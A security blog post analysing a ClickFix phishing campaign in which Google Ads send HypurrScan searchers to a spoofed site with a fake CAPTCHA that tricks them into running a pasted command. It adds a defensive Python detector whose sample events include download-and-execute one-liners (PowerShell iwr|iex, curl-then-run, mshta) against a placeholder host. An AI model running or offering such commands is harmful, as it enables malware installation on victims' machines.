Phishing Gets Hyperliquid: When Google Ads Serve the Payload

While poking around Hyperliquid ecosystem tools — partly to amuse a crypto-obsessed colleague — we stumbled onto a phishing campaign that’s both simple and elegant: it uses Google Ads to serve malware to people searching for HypurrScan, the blockchain explorer for Hyperliquid.
What we found wasn’t a wallet-draining link or a seed-phrase scam. It was command execution via a fake CAPTCHA, built into a spoofed Cloudflare verification page, and aimed at exactly the kind of user likely to hold crypto.
The Attack Flow: Clean, Layered, and Deceptive
1. User searches for “Hypurrscan”
Google serves a sponsored ad that looks legitimate: the displayed URL reads hypurrscan.io, complete with the explorer’s metadata and branding.

2. Click leads to a phishing domain
The ad redirects to hypurrscan.net, a spoofed site mimicking the original. Instead of the explorer, it loads a “Verify you are human” page.

3. Fake CAPTCHA loads distorted images
The site presents an AI-generated visual puzzle. It isn’t designed to validate anything; it exists only to stall the user and build the expectation that a verification step is underway.

4. An error triggers the real attack
As you begin interacting, the puzzle throws an error and loads a new screen instructing you to complete “manual verification”:

The Payload: “Paste and Run”
This phishing kit applies a technique we’ve been seeing more and more often (widely referred to as ClickFix): the attacker tricks the user into opening the Windows Run dialog (Win+R), pasting a command the page has already placed on the clipboard, and pressing Enter, all under the guise of a verification step.
It’s elegant, because:
- It sidesteps browser-based protections entirely: nothing is downloaded or executed by the browser, so download warnings and Mark-of-the-Web never come into play
- The victim runs the payload themselves, from their own interactive session
- It needs no macro-enabled document, no attachment, and no file for the user to open; the initial execution is a single command line typed into Run
Typical outcomes from this approach include:
- Downloading and executing malware (e.g. infostealers, remote access tools)
- Setting persistence via shell:startup, scheduled tasks, or registry keys
- Establishing a connection back to attacker-controlled infrastructure
This is social engineering meets command execution, and it’s incredibly effective, especially against tech-savvy users who have been conditioned to click through “verify you are human” prompts without a second thought.
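The one thing a defender can rely on in this flow is that the pasted command is launched from the Run dialog, so in process-creation telemetry (Sysmon Event ID 1, Windows Security 4688 or an EDR equivalent) the child of explorer.exe is an interpreter or downloader with a command line that fetches something from the internet. The following detection logic is an added example, not code from the original post or from the campaign’s kit; the event shape and the sample command lines are constructed for illustration, and the field names follow Sysmon’s ParentImage/Image/CommandLine convention.

```python
"""Flag "paste and run" executions in process-creation telemetry.

Added example: looks for explorer.exe (the parent of anything launched from
the Run dialog) spawning a script interpreter or downloader whose command
line carries download-and-execute traits. Event shape mirrors Sysmon Event
ID 1 fields; the sample events below are constructed, not real telemetry.
"""
import ntpath
import re

# Constructed sample events (illustrative only).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/v.txt | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://example.invalid/verify"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c curl -s http://example.invalid/a.exe -o %TEMP%\a.exe && %TEMP%\a.exe"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -File C:\Users\me\scripts\cleanup.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # Base64 blob is a constructed placeholder, not a real payload.
     "CommandLine": "powershell -nop -ep bypass -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFB"},
]

# Interpreters and downloaders a pasted one-liner typically hands off to.
RUN_TARGETS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe",
    "regsvr32.exe", "rundll32.exe",
}

# Command-line traits of a "verification" one-liner. Each match is one indicator.
INDICATORS = {
    "remote_url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(
        r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_and_run": re.compile(
        r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring|"
        r"curl|certutil\s+-urlcache|mshta)\b", re.I),
}


def basename(path):
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def detect_paste_and_run(events, min_indicators=1):
    """Return findings for events that look like Run-dialog payload launches.

    A finding requires the explorer.exe -> interpreter/downloader lineage plus
    at least `min_indicators` command-line traits; the lineage alone is too
    noisy, since double-clicking any script also runs under explorer.exe.
    """
    findings = []
    for ev in events:
        parent = basename(ev.get("ParentImage", ""))
        child = basename(ev.get("Image", ""))
        if parent != "explorer.exe" or child not in RUN_TARGETS:
            continue
        cmd = ev.get("CommandLine", "")
        hits = [name for name, rx in INDICATORS.items() if rx.search(cmd)]
        if len(hits) >= min_indicators:
            findings.append({"image": child, "indicators": hits, "command_line": cmd})
    return findings


if __name__ == "__main__":
    for finding in detect_paste_and_run(SAMPLE_EVENTS):
        print(finding["image"], finding["indicators"], finding["command_line"], sep="  |  ")
```

Run against the constructed events it flags the hidden-window PowerShell download, the mshta fetch, the cmd-plus-curl chain and the encoded command, and stays quiet on notepad, on PowerShell spawned by an editor, and on a plain `-File` launch from Explorer. For forensic corroboration after the fact, the pasted text is also recorded in the victim’s `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU` key, which is worth pulling alongside the process tree.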
Why Hyperliquid?
The choice of HypurrScan as bait isn’t random. By buying ad placement on a niche blockchain explorer, attackers:
- Target users likely to hold crypto
- Ride a rising asset: Hyperliquid sits among the top-10 cryptocurrencies and is still climbing
- Know exactly which chain their victims are active on (Hyperliquid)
- Can profile victims with high precision based on search intent alone
This is a surgical phishing funnel. Not broad spray-and-pray spam. It’s crafted for maximum relevance and conversion. And that’s how Phishing gets Hyperliquid! 😉
Recommendations
- Audit Your Brand in Search Results
Especially in crypto and Web3, search abuse is rampant. Regularly check for both organic and sponsored impersonation of your tools, explorers, and wallets.
- Expand Security Awareness to Include Browser Phishing
Your users might know how to spot a fake email, but not a spoofed CAPTCHA or an OS-level prompt. Train them to recognize these hybrid techniques.
- Report and Monitor Ad Abuse
Google does take malicious ads down, but only if flagged. Use screenshots, network captures, and short descriptions when reporting.
- Assume Targeted Intent
If your brand or tool is being impersonated, assume your users are being profiled. Phishing is no longer random; it’s intent-aware.
Final Note: The One That Got Away
Unfortunately, the phishing site was taken offline before we could collect the full payload. But based on the structure, behavior, and timing, it’s clear this wasn’t a sloppy one-off. It’s part of an ongoing evolution: phishing campaigns that borrow modern UI patterns, legitimate ad platforms, and user-triggered execution.
